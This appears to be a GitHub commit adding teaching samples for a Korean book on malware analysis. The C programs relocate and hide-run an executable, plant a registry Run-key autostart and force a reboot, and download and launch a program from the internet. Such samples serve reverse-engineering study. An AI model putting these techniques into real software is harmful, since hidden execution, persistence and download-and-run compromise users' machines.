Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
리버싱 이 정도는 알아야지 - 만들고 분석하면서 배우는 악성코드 분석
- Loading branch information
Showing
12 changed files
with
940 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,10 @@ | ||
#include <windows.h> | ||
|
||
int main( ) | ||
{ | ||
Beep(0x200, 0x300); | ||
|
||
MessageBoxA(NULL, "Hi, Have a nice day!", "SecurityFactory", 0); | ||
|
||
return 1; | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,98 @@ | ||
#include <windows.h> | ||
#include <stdio.h> | ||
|
||
int main( ) { | ||
HANDLE hSourceFile, hDestFile; | ||
TCHAR lpBuffPath[MAX_PATH] = {0,}, | ||
lpTargetPath[MAX_PATH] = {0, }; | ||
char *lpBuffer = NULL; | ||
DWORD dwFileSize = 0, | ||
dwRead = 0, | ||
dwWrite = 0; | ||
bool bResult = FALSE; | ||
|
||
//Get the Current Folder path. | ||
GetCurrentDirectory(MAX_PATH, lpBuffPath); | ||
|
||
//Get Source Sample 01.exe File Path. | ||
wsprintf(lpTargetPath, "%s%s", lpBuffPath, "\\Sample 01.exe"); | ||
|
||
//Open the Source Sample 01.exe. | ||
hSourceFile = CreateFile(lpTargetPath, | ||
GENERIC_READ, | ||
0, NULL, | ||
OPEN_EXISTING, | ||
FILE_ATTRIBUTE_NORMAL, | ||
NULL); | ||
if(hSourceFile == INVALID_HANDLE_VALUE) | ||
{ | ||
return 0; | ||
} | ||
|
||
//Get Source Sample.exe File Size. | ||
dwFileSize = GetFileSize(hSourceFile, NULL); | ||
if(dwFileSize == 0xFFFFFFFF) | ||
{ | ||
CloseHandle(hSourceFile); | ||
return 0; | ||
} | ||
|
||
//Allocate Buffer to Memory. | ||
lpBuffer = (char *)malloc(dwFileSize + 1); | ||
if(lpBuffer == NULL) | ||
{ | ||
CloseHandle(hSourceFile); | ||
return 0; | ||
} | ||
|
||
//Read the Source Sample.exe File Data. | ||
bResult = ReadFile(hSourceFile, lpBuffer, dwFileSize, &dwRead, NULL); | ||
if(!bResult) | ||
{ | ||
free(lpBuffer); | ||
CloseHandle(hSourceFile); | ||
return 0; | ||
} | ||
CloseHandle(hSourceFile); | ||
|
||
//Delete the Source Sample.exe. | ||
bResult = DeleteFile(lpTargetPath); | ||
if(!bResult) | ||
{ | ||
free(lpBuffer); | ||
return 0; | ||
} | ||
|
||
//Get the Temp Folder path. | ||
GetTempPath(MAX_PATH, lpBuffPath); | ||
|
||
//Get Source Sample.exe File Path. | ||
wsprintf(lpTargetPath, "%s%s", lpBuffPath, "Replicated Sample 01.exe"); | ||
|
||
//Create the DestSample.exe. | ||
hDestFile = CreateFile( lpTargetPath, | ||
GENERIC_WRITE, | ||
0, NULL, | ||
CREATE_NEW, | ||
FILE_ATTRIBUTE_NORMAL, | ||
NULL); | ||
if(hDestFile == INVALID_HANDLE_VALUE) | ||
{ | ||
free(lpBuffer); | ||
return 0; | ||
} | ||
|
||
//Write the Source Sample.exe File Data in DestSample.exe File. | ||
bResult = WriteFile(hDestFile, lpBuffer, dwFileSize, &dwWrite, NULL); | ||
if(!bResult) | ||
{ | ||
free(lpBuffer); | ||
CloseHandle(hDestFile); | ||
return 0; | ||
} | ||
CloseHandle(hDestFile); | ||
|
||
WinExec(lpTargetPath, SW_HIDE); | ||
|
||
return 1; | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,119 @@ | ||
#include <windows.h> | ||
#include <stdio.h> | ||
|
||
int main( ) { | ||
WIN32_FIND_DATA FileData; | ||
HANDLE hFind, hSourceFile, hDestFile; | ||
TCHAR lpBuffPath[MAX_PATH] = {0, }, | ||
lpFindPath[MAX_PATH] = {0, }, | ||
lpTargetPath[MAX_PATH] = {0, }; | ||
char *lpBuffer = NULL; | ||
DWORD dwFileSize = 0, | ||
dwRead = 0, | ||
dwWrite = 0; | ||
bool bResult = FALSE; | ||
|
||
//Get the Current Folder path. | ||
GetCurrentDirectory(MAX_PATH, lpBuffPath); | ||
|
||
//Determines the Find Path. | ||
wsprintf(lpFindPath, "%s\\%s", lpBuffPath, "*.*"); | ||
|
||
//Find the first file in the specified area. | ||
hFind = FindFirstFile(lpFindPath, &FileData); | ||
if(hFind==INVALID_HANDLE_VALUE) | ||
{ | ||
return 0; | ||
} | ||
|
||
do { | ||
if(strcmp(FileData.cFileName, "Sample 01.exe") == 0) | ||
{ | ||
wsprintf(lpFindPath, "%s\\%s", lpBuffPath, FileData.cFileName); | ||
|
||
//Open the Source Sample.exe. | ||
hSourceFile = CreateFile(lpFindPath, | ||
GENERIC_READ, | ||
0, NULL, | ||
OPEN_EXISTING, | ||
FILE_ATTRIBUTE_NORMAL, | ||
NULL); | ||
if(hSourceFile == INVALID_HANDLE_VALUE) | ||
{ | ||
CloseHandle(hFind); | ||
return 0; | ||
} | ||
|
||
//Get Source Sample.exe File Size. | ||
dwFileSize = GetFileSize(hSourceFile, NULL); | ||
if(dwFileSize == 0xFFFFFFFF) | ||
{ | ||
CloseHandle(hSourceFile); | ||
CloseHandle(hFind); | ||
return 0; | ||
} | ||
|
||
//Allocate Buffer to Memory. | ||
lpBuffer = (char *)malloc(dwFileSize + 1); | ||
if(lpBuffer == NULL) | ||
{ | ||
CloseHandle(hSourceFile); | ||
CloseHandle(hFind); | ||
return 0; | ||
} | ||
|
||
//Read the Source Sample.exe File Data. | ||
bResult = ReadFile(hSourceFile, lpBuffer, dwFileSize, &dwRead, NULL); | ||
if(!bResult) | ||
{ | ||
CloseHandle(hSourceFile); | ||
CloseHandle(hFind); | ||
return 0; | ||
} | ||
CloseHandle(hSourceFile); | ||
|
||
//Delete the Source Sample.exe. | ||
bResult = DeleteFile(lpFindPath); | ||
if(!bResult) | ||
{ | ||
CloseHandle(hFind); | ||
return 0; | ||
} | ||
|
||
//Get the Temp Folder path. | ||
GetTempPath(MAX_PATH, lpBuffPath); | ||
|
||
//Get Source Sample.exe File Path. | ||
wsprintf(lpTargetPath, "%s%s", lpBuffPath, "Replicated Sample 01.exe"); | ||
|
||
//Create the DestSample.exe. | ||
hDestFile = CreateFile( lpTargetPath, | ||
GENERIC_WRITE, | ||
0, NULL, | ||
CREATE_NEW, | ||
FILE_ATTRIBUTE_NORMAL, | ||
NULL); | ||
if(hDestFile == INVALID_HANDLE_VALUE) | ||
{ | ||
CloseHandle(hFind); | ||
return 0; | ||
} | ||
|
||
//Write the Source Sample.exe File Data in DestSample.exe File. | ||
bResult = WriteFile(hDestFile, lpBuffer, dwFileSize, &dwWrite, NULL); | ||
if(!bResult) | ||
{ | ||
CloseHandle(hDestFile); | ||
CloseHandle(hFind); | ||
return 0; | ||
} | ||
CloseHandle(hDestFile); | ||
|
||
WinExec(lpTargetPath, SW_HIDE); | ||
} | ||
} while(FindNextFile(hFind, &FileData)); //Find Next File in TampPath. | ||
|
||
CloseHandle(hFind); | ||
|
||
return 1; | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,57 @@ | ||
#include <windows.h> | ||
#include <stdio.h> | ||
|
||
int main( ) | ||
{ | ||
HKEY hKey; | ||
TCHAR lpRunPath[] = "SOFTWARE\\Microsoft\\windows\\CurrentVersion\\Run"; | ||
TCHAR lpSamplePath[] = "C:\\Sample 01.exe"; | ||
TCHAR lpValue[MAX_PATH] = {0,}; | ||
DWORD dwCount = 0, | ||
dwValueSize = _MAX_PATH; | ||
LONG lResult; | ||
|
||
lResult = RegOpenKeyEx (HKEY_LOCAL_MACHINE, | ||
lpRunPath, | ||
0, | ||
KEY_ALL_ACCESS, | ||
&hKey); | ||
if(lResult != ERROR_SUCCESS) | ||
return 0; | ||
|
||
for (dwCount; lResult == 0x0000 || lResult == 0x00EA; dwCount++) | ||
{ | ||
//Retrieves the value of the registry. | ||
lResult = RegEnumValue (hKey, | ||
dwCount, | ||
lpValue, | ||
&dwValueSize, | ||
0, NULL, NULL, NULL); | ||
|
||
//If the Sample value exists, delete the value. | ||
if(!strcmp(lpValue, "Run_Sample")) | ||
RegDeleteValue(hKey, lpValue); | ||
} | ||
|
||
dwValueSize = (DWORD) strlen(lpSamplePath) + 1; | ||
|
||
//Register the Sample values. | ||
lResult = RegSetValueEx(hKey, | ||
"Run_Sample", | ||
0, REG_SZ, | ||
(BYTE*)lpSamplePath, | ||
dwValueSize); | ||
if(lResult != ERROR_SUCCESS) | ||
{ | ||
RegCloseKey(hKey); | ||
return 0; | ||
} | ||
|
||
RegCloseKey(hKey); | ||
|
||
MessageBox(NULL, "The registration has been completed.\nComputer Reset START!!", "RegEdit", MB_OK); | ||
|
||
WinExec("cmd.exe /C shutdown -r -f -t 0", SW_HIDE); | ||
|
||
return 1; | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,77 @@ | ||
#include <windows.h> | ||
#include <wininet.h> | ||
#include <stdio.h> | ||
|
||
int main( ) { | ||
HINTERNET hInternet, hUrl; | ||
HANDLE hFile; | ||
DWORD dwRead = 0, | ||
dwWritten = 0, | ||
dwSize = 0; | ||
TCHAR lpUrlPath[MAX_PATH] = "https://live.sysinternals.com/procexp.exe", | ||
lpBuffer[100000], | ||
lpProcPath[256]; | ||
bool bResult = FALSE; | ||
|
||
GetTempPath(256, lpProcPath); | ||
strcat(lpProcPath, "\procexp.exe"); | ||
|
||
hFile = CreateFile( lpProcPath, | ||
GENERIC_WRITE, | ||
0, NULL, | ||
CREATE_ALWAYS, | ||
FILE_ATTRIBUTE_NORMAL, | ||
NULL); | ||
|
||
if(hFile != INVALID_HANDLE_VALUE) | ||
{ | ||
hInternet = InternetOpen( "HTTP", | ||
INTERNET_OPEN_TYPE_PRECONFIG, | ||
NULL, NULL, 0); | ||
if(!hInternet) | ||
{ | ||
printf("CALL FAIL_InternetOpen!!\n"); | ||
return 0; | ||
} | ||
|
||
hUrl = InternetOpenUrl( hInternet, | ||
lpUrlPath, | ||
NULL, 0, | ||
INTERNET_FLAG_RELOAD, 0); | ||
if(!hUrl) | ||
{ | ||
printf("CALL FAIL_InternetOpenUrl!!\n"); | ||
return 0; | ||
} | ||
|
||
//Repeat until the download is complete. | ||
do { | ||
//Make sure that the data is ready to be downloaded. | ||
bResult = InternetQueryDataAvailable(hUrl, &dwSize, 0, 0); | ||
if(!bResult) | ||
{ | ||
printf("CALL FAIL_InternetQueryDataAvailable!!\n"); | ||
return 0; | ||
} | ||
|
||
//Read Data From URL. | ||
bResult = InternetReadFile (hUrl, lpBuffer, dwSize, &dwRead); | ||
if(!bResult) | ||
{ | ||
printf("CALL FAIL_InternetReadFile!!\n"); | ||
return 0; | ||
} | ||
|
||
//Write File Data. | ||
WriteFile (hFile, lpBuffer, dwRead, &dwWritten, NULL); | ||
} while (dwRead != 0); | ||
|
||
InternetCloseHandle (hInternet); | ||
InternetCloseHandle (hUrl); | ||
} | ||
CloseHandle (hFile); | ||
|
||
ShellExecute(NULL, "open", lpProcPath, NULL, NULL, SW_SHOW); | ||
|
||
return 1; | ||
} |
Oops, something went wrong.